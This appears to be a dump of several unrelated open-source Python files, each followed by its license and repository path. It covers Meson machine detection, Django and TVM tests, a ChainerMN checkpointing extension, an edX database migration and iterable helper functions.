always run 32-bit binaries on 64-bit natively if the host # and build systems are the same. We don't pass any compilers to # detect_cpu_family() here because we always want to know the OS # architecture, not what the compiler environment tells us. if self.has_host() and detect_cpu_family({}) == 'x86_64' and \ self.config['host_machine']['cpu_family'] == 'x86' and \ self.config['host_machine']['system'] == detect_system(): return False return True class MachineInfo: def __init__(self, system, cpu_family, cpu, endian): self.system = system self.cpu_family = cpu_family self.cpu = cpu self.endian = endian def __eq__(self, other): if self.__class__ is not other.__class__: return NotImplemented return \ self.system == other.system and \ self.cpu_family == other.cpu_family and \ self.cpu == other.cpu and \ self.endian == other.endian def __ne__(self, other): if self.__class__ is not other.__class__: return NotImplemented return not self.__eq__(other) @staticmethod def detect(compilers = None): """Detect the machine we're running on If compilers are not provided, we cannot know as much. None out those fields to avoid accidentally depending on partial knowledge. The underlying ''detect_*'' method can be called to explicitly use the partial information. """ return MachineInfo( detect_system(), detect_cpu_family(compilers) if compilers is not None else None, detect_cpu(compilers) if compilers is not None else None, sys.byteorder) @staticmethod def from_literal(literal): minimum_literal = {'cpu', 'cpu_family', 'endian', 'system'} if set(literal) < minimum_literal: raise EnvironmentException( 'Machine info is currently {}\n'.format(literal) + 'but is missing {}.'.format(minimum_literal - set(literal))) cpu_family = literal['cpu_family'] if cpu_family not in known_cpu_families: mlog.warning('Unknown CPU family %s, please report this at https://github.com/mesonbuild/meson/issues/new' % cpu_family) endian = literal['endian'] if endian not in ('little', 'big'): mlog.warning('Unknown endian %s' % endian) return MachineInfo( literal['system'], cpu_family, literal['cpu'], endian) def is_windows(self): """ Machine is windows? """ return self.system == 'windows' def is_cygwin(self): """ Machine is cygwin? """ return self.system == 'cygwin' def is_linux(self): """ Machine is linux? """ return self.system == 'linux' def is_darwin(self): """ Machine is Darwin (iOS/OS X)? """ return self.system in ('darwin', 'ios') def is_android(self): """ Machine is Android? """ return self.system == 'android' def is_haiku(self): """ Machine is Haiku? """ return self.system == 'haiku' def is_openbsd(self): """ Machine is OpenBSD? """ return self.system == 'openbsd' # Various prefixes and suffixes for import libraries, shared libraries, # static libraries, and executables. # Versioning is added to these names in the backends as-needed. def get_exe_suffix(self): if self.is_windows() or self.is_cygwin(): return 'exe' else: return '' def get_object_suffix(self): if self.is_windows(): return 'obj' else: return 'o' def libdir_layout_is_win(self): return self.is_windows() \ or self.is_cygwin() class MachineInfos(PerMachine): def __init__(self): super().__init__(None, None, None) def default_missing(self): """Default host to buid and target to host. This allows just specifying nothing in the native case, just host in the cross non-compiler case, and just target in the native-built cross-compiler case. """ if self.host is None: self.host = self.build if self.target is None: self.target = self.host def miss_defaulting(self): """Unset definition duplicated from their previous to None This is the inverse of ''default_missing''. By removing defaulted machines, we can elaborate the original and then redefault them and thus avoid repeating the elaboration explicitly. """ if self.target == self.host: self.target = None if self.host == self.build: self.host = None def detect_build(self, compilers = None): self.build = MachineInfo.detect(compilers) class BinaryTable: # Map from language identifiers to environment variables. evarMap = { # Compilers 'c': 'CC', 'cpp': 'CXX', 'cs': 'CSC', 'd': 'DC', 'fortran': 'FC', 'objc': 'OBJC', 'objcpp': 'OBJCXX', 'rust': 'RUSTC', 'vala': 'VALAC', # Binutils 'strip': 'STRIP', 'ar': 'AR', } @classmethod def detect_ccache(cls): try: has_ccache = subprocess.call(['ccache', '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError: has_ccache = 1 if has_ccache == 0: cmdlist = ['ccache'] else: cmdlist = [] return cmdlist @classmethod def warn_about_lang_pointing_to_cross(cls, compiler_exe, evar): evar_str = os.environ.get(evar, 'WHO_WOULD_CALL_THEIR_COMPILER_WITH_THIS_NAME') if evar_str == compiler_exe: mlog.warning('''Env var %s seems to point to the cross compiler. This is probably wrong, it should always point to the native compiler.''' % evar) @classmethod def parse_entry(cls, entry): compiler = mesonlib.stringlistify(entry) # Ensure ccache exists and remove it if it doesn't if compiler[0] == 'ccache': compiler = compiler[1:] ccache = cls.detect_ccache() else: ccache = [] # Return value has to be a list of compiler 'choices' return compiler, ccache
apache-2.0
pratikmallya/hue
desktop/core/ext-py/Django-1.6.10/tests/initial_sql_regress/tests.py
58
1614
from django.core.management.color import no_style from django.core.management.sql import custom_sql_for_model from django.db import connections, DEFAULT_DB_ALIAS from django.test import TestCase from django.test.utils import override_settings from .models import Simple class InitialSQLTests(TestCase): """ The format of the included SQL file for this test suite is important. It must end with a trailing newline in order to test the fix for #2161. """ def test_initial_sql(self): """ As pointed out by #14661, test data loaded by custom SQL can't be relied upon; as a result, the test framework flushes the data contents before every test. This test validates that this has occurred. """ self.assertEqual(Simple.objects.count(), 0) def test_custom_sql(self): """ Simulate the custom SQL loading by syncdb. """ connection = connections[DEFAULT_DB_ALIAS] custom_sql = custom_sql_for_model(Simple, no_style(), connection) self.assertEqual(len(custom_sql), 9) cursor = connection.cursor() for sql in custom_sql: cursor.execute(sql) self.assertEqual(Simple.objects.count(), 9) self.assertEqual( Simple.objects.get(name__contains='placeholders').name, '"100%" of % are not placeholders' ) @override_settings(DEBUG=True) def test_custom_sql_debug(self): """ Same test, ensure that CursorDebugWrapper doesn't alter sql loading (#3485). """ self.test_custom_sql()
apache-2.0
dmlc/tvm
tests/python/topi/python/test_topi_space_to_batch_nd.py
2
2735
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Test code for space to batch""" import numpy as np import tvm from tvm import te from tvm import topi import tvm.testing import tvm.topi.testing def verify_space_to_batch_nd(input_shape, block_shape, pad_before, pad_after, pad_value=0): out_shape = [] out_shape.append(int((input_shape[0] * np.prod(block_shape)))) for i in range(1, len(block_shape) + 1): pad = pad_before[i - 1] + pad_after[i - 1] out_shape.append(int((input_shape[i] + pad) // block_shape[i - 1])) for i in range(len(block_shape) + 1, len(input_shape)): out_shape.append(input_shape[i]) A = te.placeholder(input_shape, name="A", dtype="float32") dtype = A.dtype a_np = np.random.uniform(size=input_shape).astype(dtype) B = topi.nn.space_to_batch_nd(A, block_shape, pad_before, pad_after, pad_value) b_np = tvm.topi.testing.space_to_batch_nd_python( a_np, block_shape, pad_before, pad_after, pad_value ) def check_device(device, ctx): print("Running on target: %s" % device) with tvm.target.create(device): s = tvm.topi.testing.get_injective_schedule(device)(B) a = tvm.nd.array(a_np, ctx) b = tvm.nd.array(np.zeros(out_shape, dtype=dtype), ctx) f = tvm.build(s, [A, B], device) f(a, b) tvm.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-3, atol=1e-3) for device, ctx in tvm.testing.enabled_targets(): check_device(device, ctx) @tvm.testing.uses_gpu def test_space_to_batch(): # Without paddings verify_space_to_batch_nd([3, 3, 2, 1], [3], [0], [0]) # With paddings verify_space_to_batch_nd([3, 3, 2, 1], [3], [1], [2]) # Multiple spatial dims verify_space_to_batch_nd([3, 3, 4, 5, 2], [3, 4, 2], [1, 0, 3], [2, 0, 0]) # No remaining dims verify_space_to_batch_nd([3, 3, 4, 5, 2], [3, 4, 2, 2], [1, 4, 0, 0], [2, 0, 1, 0]) if __name__ == "__main__": test_space_to_batch()
apache-2.0
jnishi/chainer
chainermn/extensions/checkpoint.py
3
11305
import errno import os import shutil import tempfile import time import chainer from chainer.training import extension from chainer.utils import experimental def create_multi_node_checkpointer(name, comm, cp_interval=5, gc_interval=5, path=None): '''Create multi-node checkpointer object Generational snapshot extension to allow fault tolerance; It keeps several old snapshots to rollback synchronized snapshot at each MPI process. Snapshot files are identified as '<name>.<rank>.<iteration>'. - <name> ... identifier of the run where snapshot is kept for - <rank> ... which process owned the model - <iteration> ... number of iteration. This extension keeps several files for each execution and allows users to resume the whole job at the latest snapshots of each MPI process, and the iteration where all snapshots agrees. As this object is a usual Chainer extension, users can just create this object and pass to the trainer as an extension:: checkpointer = create_multi_node_checkpointer(name=run_id, comm=comm) trainer.extend(checkpointer, trigger=(25, 'iteration')) To run recovery at startup, before first iteration, run checkpointer.maybe_load(trainer, optimizer) before ``trainer.run()`` . If nothing is recovered (i.e. no snapshot found), ``trainer.updater.iteration`` will remain ``0`` . Otherwise it will have the value of snapshot and the training will resume from that iteration. ``optimizer`` is optional but this will let multi node optimizer avoid initial broadcast when all snapshot data among nodes are all in sync. .. note:: Make sure that ``checkpointer.maybe_load`` is called *after* all extensions with states, such as ``ExponentialShift``, set to the trainer. After training finished without errors all those temporary checkpoints will be cleaned up at all nodes. Another example to use checkpointer *without* trainer would be:: checkpointer = create_multi_node_checkpointer(name=run_id, comm=comm) checkpointer.maybe_load(obj_you_want_to_snap, optimizer) while True: ## Training loop ... updater.update() ... checkpointer.save(obj_you_want_to_snap) # Make a checkpoint Args: name (str): unique id of the run comm: communicater in ChainerMN cp_interval (int): minimum number of checkpoints to preserve gc_interval (int): interval to collect non-preserved checkpoints ''' experimental('chainermn.extensions.create_multi_node_checkpointer') return _MultiNodeCheckpointer(name, comm, cp_interval, gc_interval, path) class _CheckpointStats(object): def __init__(self): self.timings = [] self.begin = None def start(self): self.begin = time.time() def end(self): e = time.time() if self.begin is None: return self.timings.append({'b': self.begin, 'd': e - self.begin}) self.begin = None def report(self): count = len(self.timings) if count == 0: return 'No stats available' durations = [t['d'] for t in self.timings] average = sum(durations) / count fmt_str = "Snapshot duration stats (sec): avg={:f}, min={:f}, max={:f}" return fmt_str.format(average, min(durations), max(durations)) class _MultiNodeCheckpointer(extension.Extension): def __init__(self, name, comm, cp_interval, gc_interval, path): self.name = name self.cp_interval = cp_interval self.gc_interval = gc_interval self.comm = comm self.files = [] self.stats = _CheckpointStats() # TODO(kuenishi): support path expression such as # 'path/{rank}/snapshot' or 'path/{host}/snapshot' if path is not None: self.path = path _maybe_makedirs(self.path) else: self.path = None assert name is not None assert self.cp_interval > 0 assert self.gc_interval > 0 assert self.comm is not None def __call__(self, trainer): # This is supposed to be called at the exact same interval # among all nodes if self.path is None: # Note: In a non-trainer use case this path will fail; You # shouldn't pass None at __init__(). self.path = trainer.out self.save(trainer, trainer.updater.iteration) def save(self, target, iteration): '''Take snapshots of a target (mostly trainer) at each node This must be called at all nodes synchronously at the same timing of same iteration. ''' # TODO(kuenishi): Possibly taking checksum on snapshot file # may help model loading more reliable ... snapshot_object is # smart that uses temporary files and then moving the file, # which prevents partial write by atomic operation. If we # assume external hands such as bit rot or file truncate we # need this. In current implementation manual removal of # latest snapshot files will let recovery happen against # next-latest snapshot. filename = self._filename(iteration) self.stats.start() _save(self.path, filename, target) self.stats.end() self.files.append(filename) if len(self.files) - self.cp_interval > 5: # remove older snapshots, and broadcast latest list self._sync_file_list(remove_remainder=True) def finalize(self): '''Finalize checkpointer Clean up all intermediate snapshots. ''' assert self.path is not None files2remove = self.files for file in files2remove: filename = os.path.join(self.path, file) try: os.remove(filename) except Exception: pass self.files = [] def get_stats(self): '''Get statistics of taking snapshots After or during training, checkpointer holds statistics on saving checkpoints such as average time, minimum and maximum time. With this stats users may identify slow nodes or disk, or know average time penalty of taking snapshot and optmize interval to take snapshots. ''' return self.stats.report() def _sync_file_list(self, remove_remainder=False): file_lists = self.comm.gather_obj(self.files) iters0 = None if self.comm.rank == 0: if file_lists is not None: if len(file_lists) == 0: self.files = [] return iters0 = set( [i for _, _, i in self._parse_filenames(file_lists[0])]) for files in file_lists[1:]: iters = set( [i for _, _, i in self._parse_filenames(files)]) iters0 &= iters iters0 = list(iters0) iters0.sort() iters0 = iters0[-self.cp_interval:] else: raise RuntimeError("Can't gather checkpoint file names") iters0 = self.comm.bcast_obj(iters0) files = self._filenames(iters0) if remove_remainder: files2remove = set(self.files) - set(files) for file in files2remove: try: os.remove(os.path.join(self.path, file)) except Exception: pass self.files = files def _filenames(self, iterations): return [self._filename(i) for i in iterations] def _filename(self, iteration): # TODO(kuenishi): As a node identifier, should we use node # name (e.g. hostname) or MPI rank? # # hostname is fine when MPI rank changes among same set of nodes. # MPI rank is fine when node fails and a new node has come. filename = '{:s}.{:d}.{:d}'.format( self.name, self.comm.rank, iteration) return filename def _parse_filenames(self, filenames): # extract filenames and return [ <iteration> ] return [self._parse_filename(f) for f in filenames] def _parse_filename(self, filename): tpl = filename.split('.') if len(tpl) != 3: return name, rank, iter = tpl if name != self.name: return return name, int(rank), int(iter) def maybe_load(self, trainer, optimizer=None, path=None): '''If there's existing model, load, sync, and resume. ''' if self.path is None: if path is not None: self.path = path else: self.path = trainer.out local_files = [] try: local_files = os.listdir(self.path) except Exception: # Maybe I am the only process that does not have result # directory pass local_iters = filter(None, self._parse_filenames(local_files)) local_iters = [i for name, rank, i in local_iters if name == self.name and rank == self.comm.rank] self.files = self._filenames(local_iters) # Collect common file list self._sync_file_list() # Get set of common snapshot numbers (=iteration number) iters = [i for name, rank, i in self._parse_filenames(self.files)] if len(iters) > 0: # Adopt latest snapshot from iteration number i = max(iters) # Note that checkpointer only verifies file name - if # exception happens here, currently manual deletion of # *latest* snapshot may checkpointer work sanely against # one older snapshot _load(self.path, self._filename(i), trainer) if optimizer is not None: # If this is a complete resume, no broadcast is needed ^^; # 'complete resume' means all workers' snapshot is preserved, # so all workers can assume their loaded model is complete. # Otherwise _MultiNodeOptimizer broadcasts and shares data # from rank 0. optimizer.__setattr__('needs_broadcast', False) def _load(path, filename, target): chainer.serializers.load_npz(os.path.join(path, filename), target) def _save(path, filename, target): # Simple save_npz may cause partial write - instead copied and # modified a bit from chainer.extensions.snapshot. _maybe_makedirs(path) prefix = 'tmp-' + filename fd, tmppath = tempfile.mkstemp(prefix=prefix, dir=path) try: chainer.serializers.save_npz(tmppath, target) except Exception: os.close(fd) os.remove(tmppath) raise os.close(fd) shutil.move(tmppath, os.path.join(path, filename)) def _maybe_makedirs(path): # This is for Python 2-3 compatibility; # os.makedirs(path, exist_ok=True) would be more simpler try: os.makedirs(path) except OSError as exc: if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise
mit
jelugbo/hebs_master
common/djangoapps/student/migrations/0029_add_lookup_table_between_user_and_anonymous_student_id.py
58
16365
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'AnonymousUserId' db.create_table('student_anonymoususerid', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('anonymous_user_id', self.gf('django.db.models.fields.CharField')(unique=True, max_length=16)), ('course_id', self.gf('django.db.models.fields.CharField')(max_length=255, db_index=True)), )) db.send_create_signal('student', ['AnonymousUserId']) def backwards(self, orm): # Deleting model 'AnonymousUserId' db.delete_table('student_anonymoususerid') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'student.anonymoususerid': { 'Meta': {'object_name': 'AnonymousUserId'}, 'anonymous_user_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '16'}), 'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}) }, 'student.courseenrollment': { 'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'}, 'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}) }, 'student.courseenrollmentallowed': { 'Meta': {'unique_together': "(('email', 'course_id'),)", 'object_name': 'CourseEnrollmentAllowed'}, 'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}), 'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'student.pendingemailchange': { 'Meta': {'object_name': 'PendingEmailChange'}, 'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'student.pendingnamechange': { 'Meta': {'object_name': 'PendingNameChange'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'new_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'student.registration': { 'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"}, 'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'student.testcenterregistration': { 'Meta': {'object_name': 'TestCenterRegistration'}, 'accommodation_code': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'accommodation_request': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}), 'authorization_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}), 'client_authorization_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20', 'db_index': 'True'}), 'confirmed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}), 'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}), 'eligibility_appointment_date_first': ('django.db.models.fields.DateField', [], {'db_index': 'True'}), 'eligibility_appointment_date_last': ('django.db.models.fields.DateField', [], {'db_index': 'True'}), 'exam_series_code': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'processed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 'testcenter_user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['student.TestCenterUser']"}), 'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}), 'upload_error_message': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}), 'upload_status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '20', 'blank': 'True'}), 'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 'user_updated_at': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}) }, 'student.testcenteruser': { 'Meta': {'object_name': 'TestCenterUser'}, 'address_1': ('django.db.models.fields.CharField', [], {'max_length': '40'}), 'address_2': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}), 'address_3': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}), 'candidate_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}), 'city': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}), 'client_candidate_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}), 'company_name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}), 'confirmed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 'country': ('django.db.models.fields.CharField', [], {'max_length': '3', 'db_index': 'True'}), 'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}), 'extension': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '8', 'blank': 'True'}), 'fax': ('django.db.models.fields.CharField', [], {'max_length': '35', 'blank': 'True'}), 'fax_country_code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}), 'middle_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'phone': ('django.db.models.fields.CharField', [], {'max_length': '35'}), 'phone_country_code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'db_index': 'True'}), 'postal_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '16', 'blank': 'True'}), 'processed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 'salutation': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}), 'state': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '20', 'blank': 'True'}), 'suffix': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}), 'upload_error_message': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}), 'upload_status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '20', 'blank': 'True'}), 'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'unique': 'True'}), 'user_updated_at': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}) }, 'student.userprofile': { 'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"}, 'allow_certificate': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}), 'gender': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}), 'goals': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}), 'level_of_education': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}), 'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}), 'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}), 'year_of_birth': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}) }, 'student.userstanding': { 'Meta': {'object_name': 'UserStanding'}, 'account_status': ('django.db.models.fields.CharField', [], {'max_length': '31', 'blank': 'True'}), 'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'standing_last_changed_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'standing'", 'unique': 'True', 'to': "orm['auth.User']"}) }, 'student.usertestgroup': { 'Meta': {'object_name': 'UserTestGroup'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}), 'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'}) } } complete_apps = ['student']
agpl-3.0
MacHu-GWU/angora-project
angora/algorithm/iterable.py
1
19421
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Module description ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module offer high performance and memory efficient looping toolset. Usually we process elements one at a time rather than bringing the whole iterable into memory all at once. - :func:`take`: Return first n items of the iterable as a list. - :func:`flatten`: Flatten one layer of nesting. - :func:`flatten_all`: Flatten arbitrary depth of nesting. Good for unknown nesting structure iterable object. - :func:`nth`: Returns the nth item or a default value. - :func:`shuffled`: Returns the shuffled iterable. - :func:`grouper`: Collect data into fixed-length chunks or blocks. - :func:`grouper_list`: Evenly divide LIST into fixed-length piece, no filled value if chunk size smaller than fixed-length. - :func:`grouper_dict`: Evenly divide DICTIONARY into fixed-length piece, no filled value if chunk size smaller than fixed-length. - :func:`running_windows`: Generate n-size running windows. - :func:`cycle_running_windows`: Generate n-size cycle running windows. - :func:`cycle_slice`: Given a list, return right hand cycle direction slice from start to end. - :func:`cycle_dist`: Find distance between x, y by means of a n-length cycle. - :func:`shift_to_the_left`: Shift array to the left. - :func:`shift_to_the_right`: Shift array to the right. - :func:`count_generator`: Count number of item in generator. Compatibility ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Python2: Yes - Python3: Yes Prerequisites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - None Class, method, function, exception ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ """ from __future__ import print_function import collections import itertools import random import sys is_py2 = (sys.version_info[0] == 2) if is_py2: from itertools import ifilterfalse as filterfalse, izip_longest as zip_longest else: # in python3 from itertools import filterfalse, zip_longest def take(n, iterable): """Return first n items of the iterable as a list. Usage:: >>> take([0, 1, 2], 2) [0, 1] """ return list(itertools.islice(iterable, n)) def flatten(list_of_list): """Flatten one layer of nesting. Usage:: >>> flatten([[0, 1], [2, 3]] [0, 1, 2, 3] """ return itertools.chain.from_iterable(list_of_list) 